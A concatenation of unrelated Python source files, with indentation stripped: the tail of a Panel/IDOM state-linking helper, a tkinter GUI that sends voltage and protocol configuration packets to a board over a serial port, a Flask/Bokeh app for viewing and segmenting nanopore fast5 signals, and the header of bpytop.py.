parameter: param.Parameter
The parameter to link to a idom state value.
Returns
-------
An idom state value which is updated when the parameter changes.
"""
import idom
from ..depends import param_value_if_widget
parameter = param_value_if_widget(parameter)
initial = getattr(parameter.owner, parameter.name)
value, set_value = idom.hooks.use_state(initial)
def update(event):
set_value(event.new)
parameter.owner.param.watch(update, parameter.name)
return value
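# Hypothetical usage sketch for IDOM.use_param (names are illustrative and assume
# idom exposes a `component` decorator in this version range):
#
#   import param, idom
#
#   class Counter(param.Parameterized):
#       count = param.Integer(default=0)
#
#   counter = Counter()
#
#   @idom.component
#   def CounterView():
#       count = IDOM.use_param(counter.param.count)
#       return idom.html.div(f"count = {count}")
#
#   pane = IDOM(CounterView)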
|
IOMaster_GUI_CommandSend.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
import serial.tools.list_ports
#from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("400x500")
tabControl = ttk.Notebook(window)
sendTab = ttk.Frame(tabControl)
receiveTab = ttk.Frame(tabControl)
tabControl.add(sendTab, text= 'Send')
tabControl.add(receiveTab, text='Receive')
tabControl.grid(column=0, row=1, columnspan=2) #expand=1, fill="both")
ser = serial.Serial()
#def EntryCheck():
#entry check for com port
#try:
#txtout.insert(TK.END, txtin.get('1.0', TK.END))
#ser = serial.Serial(port=txtin.get('1.0', TK.END)) #baudrate=115200)
#except Exception:
# messagebox.showinfo("Error", "Could Not Find Device. Enter Valid COM Port")
# window.deiconify()
# return None
#window.mainloop()
#strg = txtin.get('1.0', TK.END)
#print(strg)
#ser = serial.Serial(port=strg, baudrate=115200)
#window.deiconify()
def InitializePopup():
window.withdraw()
popup = TK.Toplevel()
popup.title("Select Device Port")
popup.geometry("450x185")
txtlbl = TK.Label(popup, text = "Select COM Port")
txtlbl.pack()
txtin = TK.Text(popup, height=1, width=17)
txtin.pack()
EnterBtn = TK.Button(popup, text = "Select", command = lambda : EntryCheck())
EnterBtn.pack()
avlbl = TK.Label(popup, text = "Available COM Ports:")
avlbl.pack()
txtout = TK.Text(popup, height=5, width=50)
txtout.pack()
ports = list(serial.tools.list_ports.comports())
for p in ports:
txtout.insert(TK.END, p)
txtout.insert(TK.END, '\n')
txtout.configure(state = 'disable')
def EntryCheck():
#entry check for com port
global ser
strg = txtin.get('1.0', TK.END)
#ser = serial.Serial.port = strg.rstrip('n')
ser = serial.Serial(strg.rstrip('\n'), 57600, serial.EIGHTBITS, serial.PARITY_NONE, serial.STOPBITS_ONE)
OutConfigTxt.configure(state="normal")
OutConfigTxt.insert(TK.END, "COM Port: " + strg.rstrip('\n') + '\n')
OutConfigTxt.configure(state="disable")
window.deiconify()
popup.destroy()
def read_from_port(ser):
while True:
reading = ser.read()
print(reading)
if reading == b'3':
messagebox.showinfo("Works", "Pushed Button")
def sendCommand(command):
ser.write(command.encode() if isinstance(command, str) else command) #pyserial write() needs bytes, so encode plain strings
class Label:
def __init__(self, win, text):
self.lbl=ttk.Label(win, text=text)
#self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
def Configure_Results():
print("Configure Results!")
#Store Variables
Protocol = cb0.cb.get()
UVoltage = VHin.get('1.0', TK.END)
Frequency = cb2.cb.get()
LVoltage = VLin.get('1.0', TK.END)
DPower = cb5.cb.get()
DataRate = cb6.cb.get()
ClPolarity = cb7.cb.get()
ChPolarity = cb9.cb.get()
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', TK.END)
#if Protocol == "I2C":
#if Protocol == "UART":
#if Protocol == "SPI":
#if Protocol == "SWD":
#if Protocol == "RS-485":
if Protocol == "":
OutConfigTxt.insert(TK.END, "Protocol: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Protocol: " + Protocol + '\n')
if UVoltage == "":
OutConfigTxt.insert(TK.END, "Upper Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Upper Voltage: " + UVoltage)
if Frequency == "":
OutConfigTxt.insert(TK.END, "Frequency: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Frequency: " + Frequency + '\n')
if LVoltage == "":
OutConfigTxt.insert(TK.END, "Lower Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Lower Voltage: " + LVoltage)
if DPower == "":
OutConfigTxt.insert(TK.END, "Device Power Level: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Device Power Level: " + DPower + '\n')
if DataRate == "":
OutConfigTxt.insert(TK.END, "Data Rate: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Data Rate: " + DataRate + '\n')
if ClPolarity == "":
OutConfigTxt.insert(TK.END, "Clock Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Clock Polarity: " + ClPolarity + '\n')
if ChPolarity == "":
OutConfigTxt.insert(TK.END, "Chip Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Chip Polarity: " + ChPolarity + '\n')
OutConfigTxt.configure(state="disable")
if (float(UVoltage) > 15 or float(UVoltage) < float(LVoltage)):
print(float(UVoltage))
print(float(LVoltage))
messagebox.showinfo("Error", "Invalid Data.\n Pick a voltage of 15V or Lower. \n Also, Upper Voltage should be larger than Lower Voltage")
return
else:
VH = float(UVoltage)
if (float(LVoltage) < -15 or float(UVoltage) < float(LVoltage)):
messagebox.showinfo("Error", "Invalid Data.\n Pick a voltage of -15V or Higher for Lower Voltage. \n Also, Upper Voltage should be larger than Lower Voltage")
return
else:
VL = float(LVoltage)
#rewr=1 because we are writing, commandbits determines what we are setting, resistor state is unknown
### No Push No Pull, VH, VL
rewr = 1
commandbits = 1
resisterStates = 0
byteSend(rewr, commandbits, resisterStates, VH, VL)
#End Function
def byteSend(rewr, commandbits, resisterStates, VH, VL):
#rewr=1 bit, commandbits=3 bits, resistor state=4 bits
rewr = rewr << 7
combits = commandbits << 4
commandByte = rewr | combits | resisterStates #byte 1
print(hex(commandByte))
TVH = round(((2**12 - 1) / 30) * (15 - VH))
TVL = round(((2**12 - 1) / 30) * (15 - VL))
UVH = (TVH >> 8) & 0xff
LVH = (TVH) & 0xff
UVL = (TVL >> 8) & 0xff
LVL = (TVL) & 0xff
OutConfigTxt.configure(state="normal")
Packet_Bytes = bytearray()
Packet_Bytes.append(commandByte)#byte1
Packet_Bytes.append(UVH)#byte2
Packet_Bytes.append(LVH)#byte3
Packet_Bytes.append(UVL)#byte4
Packet_Bytes.append(LVL)#byte5
OutConfigTxt.insert(TK.END, Packet_Bytes.hex())
OutConfigTxt.configure(state="disable")
print(Packet_Bytes)
sendCommand(Packet_Bytes)
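#Worked example (illustrative values only, not taken from hardware documentation):
#with rewr=1, commandbits=1 and resisterStates=0 the command byte is
#(1 << 7) | (1 << 4) | 0 = 0x90. For VH=5.0 and VL=-5.0:
#  TVH = round((4095 / 30) * (15 - 5.0))    = 1365 -> bytes 0x05, 0x55
#  TVL = round((4095 / 30) * (15 - (-5.0))) = 2730 -> bytes 0x0A, 0xAA
#so the five-byte packet written to the serial port is 90 05 55 0a aa.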
def Data_To_Send():
dataToSend = DataText3.get('1.0', TK.END)
for letter in dataToSend.rstrip():
if letter != '0' and letter != '1':
messagebox.showinfo("Error", "Invalid Data.\n 0s and 1s Only")
return
if dataToSend == '\n':
messagebox.showinfo("Error", "Please Enter Data to Send.\n 0s and 1s Only")
return
if len(dataToSend.rstrip()) != 8:
messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n 0s and 1s Only")
return
#print(dataToSend.rstrip())
dataToSend = 's' + dataToSend.rstrip() + '\0'
#print(dataToSend.rstrip())
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', TK.END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
sendCommand(dataToSend.rstrip())
class Button:
def __init__(self, win, text):
self.btn=ttk.Button(win, text=text, command=self.press)
def press(self):
btn_text = self.btn.cget('text')
if btn_text == "Configure":
Configure_Results()
if btn_text == "Send Data":
Data_To_Send()
#Each object needs to be created outside the function and placed on the window in the function
lbl0 = Label(window, "Protocol:") #Protocol
lbl1 = Label(sendTab, "Upper Voltage:") #Upper Voltage
lbl2 = Label(sendTab, "Frequency:") #Frequency
lbl3 = Label(sendTab, "Data to Send:") #Data to Send
lbl4 = Label(sendTab, "Lower Voltage:") #Lower Voltage
lbl5 = Label(sendTab, "Device Power Voltage:") #Device Power Voltage
lbl6 = Label(sendTab, "Data Rate:") #Data Rate
lbl7 = Label(sendTab, "Clock Polarity:") #Clock Polarity (Rise or fall)
lbl8 = Label(sendTab, "Device Address:") #Device Address
lbl9 = Label(sendTab, "Chip Select Polarity:") #Chip Select Polarity
lbl0.lbl.grid(column=0, row=0) #place protocol selection label (Always On)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485", "Custom"]) #create drop down for protocol selection
VHin = TK.Text(sendTab, height=1, width=17) #Voltage Selection
cb2 = combobox(sendTab, ["1kHz", "10kHz", "100kHz", "1MHz"]) #Frequency Selection
VLin = TK.Text(sendTab, height=1, width=17) #Lower voltage level
cb5 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Device Power Level
cb6 = combobox(sendTab, ["Data Rates"]) #Data Rates
cb7 = combobox(sendTab, ["Rising Edge", "Falling edge"]) #Clock Polarity
cb9 = combobox(sendTab, ["0", "1"]) #Chip Select Polarity
cb0.cb.grid(column=1, row=0) #Place drop down for protocols
DataText3 = TK.Text(sendTab, height=1, width=17) #Box to enter 8 bit command to board (gets checked)
AddressText = TK.Text(sendTab, height=1, width=17) #Box to enter the device address.
OutConfigTxt = TK.Text(window, height = 15, width = 42, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
btn1 = Button(sendTab, "Configure") #Send configure
btn2 = Button(sendTab, "Send Data")
#Choose which objects are displayed based on the protocol chosen
def display_create(window):
#Create Interface for SPI
if cb0.cb.get() == 'SPI':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display I2C Components
if cb0.cb.get() == 'I2C':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb9.cb.set('')
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display UART Components
if cb0.cb.get() == 'UART':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display SWD Components
if cb0.cb.get() == 'SWD':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid_forget() #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid_forget() #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid_forget() #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb6.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.delete('1.0', TK.END)
DataText3.grid_forget() #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid_forget() #Send Data from text box
#display RS-485 Components
if cb0.cb.get() == 'RS-485':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid_forget() #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid_forget() #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb7.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display Custom Options
if cb0.cb.get() == 'Custom':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
cb0.cb.bind("<<ComboboxSelected>>", display_create) #link protocol selection combobox to the above function. Displayed fields update when the drop box changes.
def main():
#global ser
#ser = serial.Serial('/dev/ttyUSB0')
InitializePopup()
serialThread = threading.Thread(target=read_from_port, args=(ser,))
serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
main.py
|
from flask import Flask, render_template, request, redirect, Markup
import os
import sys
import time
import h5py
import traceback
import numpy as np
from bokeh.plotting import figure
from bokeh.resources import CDN
from bokeh.embed import file_html
from bokeh.models import Title, HoverTool, ColumnDataSource, FreehandDrawTool, BoxEditTool, BoxAnnotation, CustomJS, Rect, Spacer
from bokeh.models.widgets.buttons import AbstractButton, Toggle
import json
from tornado.ioloop import IOLoop
from threading import Thread
from bokeh.embed import server_document
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, Slider
from bokeh.server.server import Server
from bokeh.themes import Theme
app = Flask(__name__)
signal = []
ut = None
lt = None
err = 5
err_win = 50
min_win = 150
max_merge = 50
stdev_scale = 0.75
stall_len = 0.25
@app.route('/test', methods=['GET'])
def bkapp_page():
script = server_document('http://localhost:5006/bkapp')
return render_template("embed.html", script=script, template="Flask")
@app.route("/",methods = ["POST", "GET"])
def home():
if request.method == "POST":
f5_path = request.form.get('f5_path')
type = request.form.get('type')
if not os.path.isdir(f5_path):
return render_template("home.html", error=True, f5_path=f5_path)
else:
return render_template("loading.html", f5_path=f5_path, type=type)
return render_template("home.html")
@app.route("/results")
def results(f5_path=None):
f5_path = request.args['f5_path']
type = request.args['type']
if not os.path.isdir(f5_path):
return render_template("error.html")
if request.args['processing'] == '0':
if os.path.isfile(f5_path+"/data_"+type+".tsv"):
exception = "Data file for this type already exists"
return render_template("exception.html", f5_path=f5_path, type=type, exception=exception)
if request.args['processing'] == '1':
os.remove(f5_path+"/data_"+type+".tsv")
return render_template("loading.html", f5_path=f5_path, type=type)
count = 0
with open(os.path.join(f5_path, "data_"+type+".tsv"), 'a') as out_sum:
for dirpath, dirnames, files in os.walk(f5_path):
for fast5 in files:
if fast5.endswith('.fast5'):
fast5_file = os.path.join(dirpath, fast5)
# extract data from file
data, multi = extract_f5_all(fast5_file, request.args['type'])
#print data to a single file
if not multi:
count += 1
ar = map(str, data['raw'])
out_sum.write('{}\t{}\t{}\n'.format(
fast5, data['readID'], '\t'.join(ar)))
else:
for read in data:
count += 1
ar = map(str, data[read]['raw'])
out_sum.write('{}\t{}\t{}\n'.format(
fast5, data[read]['readID'], '\t'.join(ar)))
return render_template("results.html", f5_path=f5_path, type=type, count=count)
@app.route("/view_graphs")
def view():
f5_path = request.args['f5_path']
type = request.args['type']
read = request.args.get('read_id')
id = ''
script = []
if read is None:
read = ""
reads = []
sig = None
segs = None
if not os.path.isfile(f5_path+"/data_"+type+".tsv"):
return render_template("error.html")
with open(f5_path+"/data_"+type+".tsv", 'rt') as data:
for num, l in enumerate(data):
l = l.strip('\n')
l = l.split('\t')
readID = l[1]
reads.append(l[1])
if read == readID:
fast5 = l[0]
if "." in l[4]:
sig = np.array([float(i) for i in l[4:]], dtype=float)
else:
sig = np.array([int(i) for i in l[4:]], dtype=int)
graph = dict()
if sig is not None:
global signal
signal = sig
print(signal)
Thread(target=bk_worker).start()
id = str(read)
script = server_document('http://localhost:5006/bkapp')
return render_template("view_graphs.html", f5_path=f5_path, type=type, id=id, script=script, count=len(reads), reads=reads)
else:
error = "The signal was unable to be found for "+read+" :(."
return render_template("error.html", error=error)
@app.route("/delete")
def delete():
f5_path = request.args['f5_path']
type = request.args['type']
if os.path.isfile(f5_path+"/data_"+type+".tsv"):
os.remove(f5_path+"/data_"+type+".tsv")
return redirect("/")
def extract_f5_all(filename, type):
'''
inputs:
filepath/name
args from command line
does:
opens fast5 files, extracts the whole raw signal and read metadata, and converts values to pA by default
Returns:
dict for further processing/printing
'''
f5_dic = {}
multi = True
raw = False
if type == "raw":
raw = True
with h5py.File(filename, 'r') as hdf:
reads = list(hdf.keys())
if 'read' not in reads[1]:
multi = False
# single fast5 files
if not multi:
f5_dic = {'raw': [], 'seq': '', 'readID': '',
'digitisation': 0.0, 'offset': 0.0, 'range': 0.0,
'sampling_rate': 0.0}
# extract the data
try:
c = list(hdf['Raw/Reads'].keys())
for col in hdf['Raw/Reads/'][c[0]]['Signal'][()]:
f5_dic['raw'].append(int(col))
f5_dic['readID'] = hdf['Raw/Reads/'][c[0]].attrs['read_id'].decode()
digitisation = hdf['UniqueGlobalKey/channel_id'].attrs['digitisation']
offset = hdf['UniqueGlobalKey/channel_id'].attrs['offset']
range = float("{0:.2f}".format(hdf['UniqueGlobalKey/channel_id'].attrs['range']))
# convert to pA
if not raw:
f5_dic['raw'] = np.array(f5_dic['raw'], dtype=int)
f5_dic['raw'] = convert_to_pA_numpy(f5_dic['raw'], digitisation, range, offset)
f5_dic['raw'] = np.round(f5_dic['raw'], 2)
except:
traceback.print_exc()
sys.stderr.write("extract_f5_all(): failed to extract raw signal or fastq from {}\n".format(filename))
f5_dic = {}
# multi fast5 files
else:
for read in reads:
f5_dic[read] = {'raw': [], 'seq': '', 'readID': '',
'digitisation': 0.0, 'offset': 0.0, 'range': 0.0,
'sampling_rate': 0.0}
# extract the data
try:
for col in hdf[read]['Raw/Signal'][()]:
f5_dic[read]['raw'].append(int(col))
f5_dic[read]['readID'] = hdf[read]['Raw'].attrs['read_id'].decode()
digitisation = hdf[read]['channel_id'].attrs['digitisation']
offset = hdf[read]['channel_id'].attrs['offset']
range = float("{0:.2f}".format(hdf[read]['channel_id'].attrs['range']))
# convert to pA
if not raw:
f5_dic[read]['raw'] = np.array(f5_dic[read]['raw'], dtype=int)
f5_dic[read]['raw'] = convert_to_pA_numpy(f5_dic[read]['raw'], digitisation, range, offset)
f5_dic[read]['raw'] = np.round(f5_dic[read]['raw'], 2)
except:
traceback.print_exc()
sys.stderr.write("extract_f5_all(): failed to read readID: {}\n".format(read))
return f5_dic, multi
def convert_to_pA_numpy(d, digitisation, range, offset):
raw_unit = range / digitisation
return (d + offset) * raw_unit
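# Worked example (sketch; the digitisation/range/offset values are typical MinION
# channel metadata assumed here purely for illustration): with digitisation=8192.0,
# range=1455.88 and offset=6.0, a raw sample of 500 converts to
# (500 + 6.0) * 1455.88 / 8192.0 ≈ 89.9 pA.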
def scale_outliers(sig, max, min):
''' Remove outliers that don't fit within the specified max/min bounds '''
k = (sig > min) & (sig < max)
return sig[k]
def get_segs(sig, error, error_win, min_win, max_merge, std_scale, stall_len):
'''
Get segments from signal
This works by running through the signal and finding regions that are above
the bot and below the top parameters, with some error tolerance, for a
minimum window length.
'''
mn = sig.min()
mx = sig.max()
mean = np.mean(sig)
median = np.median(sig)
# use this with outlier rejection to fix stdev thresholds
stdev = np.std(sig)
top = median + (stdev * std_scale)
bot = median - (stdev * std_scale)
# parameter tuning visualisation
# TODO: Put tuning plots here
# this is the algo. Simple yet effective
prev = False # previous string
err = 0 # total error
prev_err = 0 # consecutive error
c = 0 # counter
w = error_win # window to increase total error thresh
seg_dist = max_merge # distance between 2 segs to be merged as one
start = 0 # start pos
end = 0 # end pos
segs = [] # segments [(start, stop)]
left = []
right = []
for i in range(len(sig)):
a = sig[i]
if a < top and a > bot: # If datapoint is within range
if not prev:
start = i
prev = True
c += 1 # increase counter
w += 1 # increase window corrector count
if prev_err:
prev_err = 0
if c >= min_win and c >= w and not c % w: # if current window longer than detect limit, and corrector, and is divisible by corrector
err -= 1 # drop current error count by 1
else:
if prev and err < error:
c += 1
err += 1
prev_err += 1
if c >= min_win and c >= w and not c % w:
err -= 1
elif prev and (c >= min_win or not segs and c >= min_win * stall_len):
end = i - prev_err # go back to where error stretch began for accurate cutting
prev = False
if segs and start - segs[-1][1] < seg_dist: # if segs very close, merge them
segs[-1][1] = end
else:
segs.append([start,end])
left.append(start)
right.append(end) # save segment
c = 0
err = 0
prev_err = 0
elif prev:
prev = False
c = 0
err = 0
prev_err = 0
else:
continue
if segs:
return left, right
else:
return False
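# Usage sketch (the values below mirror the module-level defaults defined above):
#   bounds = get_segs(sig, error=5, error_win=50, min_win=150, max_merge=50,
#                     std_scale=0.75, stall_len=0.25)
#   if bounds:
#       left, right = bounds  # parallel lists of segment start/end indices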
def bkapp(doc):
global signal
global ut
global lt
global show_segs
show_segs = False
ut = 0
lt = 0
if signal.any():
ut = max(signal)
lt = min(signal)
source = ColumnDataSource(data={
'signal' : signal,
'position' : list(range(0,len(signal)))
})
p = figure()
p.line('position','signal', source=source)
p.add_tools(HoverTool(
tooltips=[
('signal', '@signal'),
('position', '@position'),
],
formatters={
'signal' : 'printf',
'position' : 'printf'
},
mode='vline'
))
renderer = p.multi_line([[1,1]], [[1,1]], line_width=4, alpha=0.5, color='green')
draw_tool = FreehandDrawTool(renderers=[renderer])
p.add_tools(draw_tool)
src = ColumnDataSource({
'x':[1,1,1], 'y':[1,1,1], 'width':[1,1,1], 'height':[1,1,1]
})
box_renderer = p.rect('x', 'y', 'width', 'height', fill_alpha=0.4, fill_color='orange', line_color='orange', source=src)
box_draw_tool = BoxEditTool(renderers=[box_renderer], empty_value=1, num_objects = 5)
p.add_tools(box_draw_tool)
ut_slider = Slider(start=lt, end=max(signal), value=max(signal), name='upper_thresh', step=1, title="Upper Threshold")
lt_slider = Slider(start=min(signal), end=ut, value=min(signal), name='lower_thresh', step=1, title="Lower Threshold")
def ut_callback(attr, old, new):
global signal
global ut
global lt
ut = new
new_signal = scale_outliers(signal, ut, lt)
source.data = {
'signal' : new_signal,
'position' : list(range(0,len(new_signal)))
}
update_segs()
def lt_callback(attr, old, new):
global signal
global ut
global lt
lt = new
new_signal = scale_outliers(signal, ut, lt)
source.data = {
'signal' : new_signal,
'position' : list(range(0,len(new_signal)))
}
update_segs()
ut_slider.on_change('value', ut_callback)
lt_slider.on_change('value', lt_callback)
segments = ColumnDataSource(data={
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
})
button = Toggle(label="View Segments", sizing_mode="scale_width")
def segment_handler(new):
global show_segs
show_segs = new
if not new:
segments.data = {
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
}
update_segs()
button.on_click(segment_handler)
err_slider = Slider(start=0, end=20, value=5, name='error', step=1, title="Allowable Error")
err_win_slider = Slider(start=0, end=100, value=50, name='err_win', step=1, title="Error Window Size")
min_win_slider = Slider(start=0, end=500, value=150, name='min_win', step=1, title="Minimum Window Size")
max_merge_slider = Slider(start=0, end=100, value=50, name='max_merge', step=1, title="Max Merge Distance")
stdev_scale_slider = Slider(start=0, end=5, value=0.75, name='stdev_scale', step=0.01, title="Standard Deviation Scale Factor")
stall_len_slider = Slider(start=0, end=5, value=0.25, name='stall_len', step=0.01, title="Stall Length")
p.quad(top='top',bottom='bottom',left='left',right='right',source=segments,fill_alpha=0.5,fill_color='pink',line_color='pink')
def err_callback(atrr, old, new):
global err
err = new
update_segs()
def err_win_callback(atrr, old, new):
global err_win
err_win = new
update_segs()
def min_win_callback(atrr, old, new):
global min_win
min_win = new
update_segs()
def max_merge_callback(atrr, old, new):
global max_merge
max_merge = new
update_segs()
def stdev_scale_callback(atrr, old, new):
global stdev_scale
stdev_scale = new
update_segs()
def stall_len_callback(atrr, old, new):
global stall_len
stall_len = new
update_segs()
def update_segs():
#need to take into account the modified signal- somehow access it?
global err
global err_win
global min_win
global max_merge
global stdev_scale
global stall_len
global ut
global lt
global show_segs
left = None
right = None
if show_segs:
sig = scale_outliers(signal, ut, lt)
if sig.any():
left, right = get_segs(sig, err, err_win, min_win, max_merge, stdev_scale, stall_len)
if left is not None and right is not None:
segments.data = {
'top' : np.full(len(left),1000),
'bottom' : np.full(len(left),0),
'left' : left,
'right' : right
}
else:
segments.data = {
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
}
err_slider.on_change('value', err_callback)
err_win_slider.on_change('value', err_win_callback)
min_win_slider.on_change('value', min_win_callback)
max_merge_slider.on_change('value', max_merge_callback)
stdev_scale_slider.on_change('value', stdev_scale_callback)
stall_len_slider.on_change('value', stall_len_callback)
doc.add_root(row(column(Spacer(height=10), ut_slider, lt_slider, Spacer(height=10), button, err_slider, err_win_slider, min_win_slider, max_merge_slider, stdev_scale_slider, stall_len_slider, Spacer(height=10), sizing_mode="stretch_height"), p, sizing_mode="stretch_both"))
doc.theme = Theme(filename="theme.yaml")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
print("I, the bk_worker, am being run")
server = Server({'/bkapp': bkapp}, io_loop=IOLoop(), allow_websocket_origin=["127.0.0.1:8080"])
server.start()
server.io_loop.start()
if __name__ == "__main__":
print('Please open the page http://127.0.0.1:8080 to access the SquiggleKit Web Application')
app.run(port="8080", debug=True)
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
